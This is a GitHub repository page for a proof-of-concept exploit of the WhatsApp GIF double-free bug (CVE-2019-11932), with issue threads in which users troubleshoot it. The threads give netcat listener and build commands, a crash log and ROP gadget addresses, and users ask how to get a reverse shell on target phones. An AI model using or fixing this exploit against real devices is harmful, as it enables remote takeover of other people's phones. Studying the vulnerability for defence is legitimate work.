awakened1712 / cve-2019-11932

Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif

Home Page: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/

Makefile 0.07% C 90.36% CMake 1.13% Java 8.44%


cve-2019-11932's Issues

setup

Hello awakened1712, can you help me? I want to run your script. I cloned the script, but how can I generate the gif and run the shell? I hope you answer me.
The commands I use:
nc -lvp 5555
gcc -o exploit egif_lib.c exploit.c
./exploit /root/Desktop/11y.gif
buffer = 0x7fff2a088260 size = 266
I sent the gif file to my phone but no shell was created. My Android version is 5.1.1.

Whatsapp crashed

Hi,
I have Android 9 with WhatsApp 2.19.203.
I found the gadget and the system with your Android apk that you published.
When I enter the WhatsApp gallery after I sent the gif file as a document, the app crashed.

Do you have any idea why?
Logs:

12-09 14:08:28.563 27111 27111 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #7 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #8 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #9 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)

Help

Hello, does this work on the latest version of "WhatsApp"? And which host and port should we listen on with netcat?

Reproduce

Hello, I got a ROP gadget at address 0x00159b80:
0x00159b80: ldr x8, [x19, #0x18]; add x0, x19, #0x20; blr x8;

I added this address to the base address of libhwui.so (0x7710ddd000). I also got the system address and changed these in the code, but the exploit is not working. The process gets a segfault and doesn't connect to my netcat listener. I'm testing on Android 9.

Any idea?

reverse shell

Listening on 0.0.0.0 1111 Connection received on 127.0.0.1 51318
Why can't I get a reverse shell?
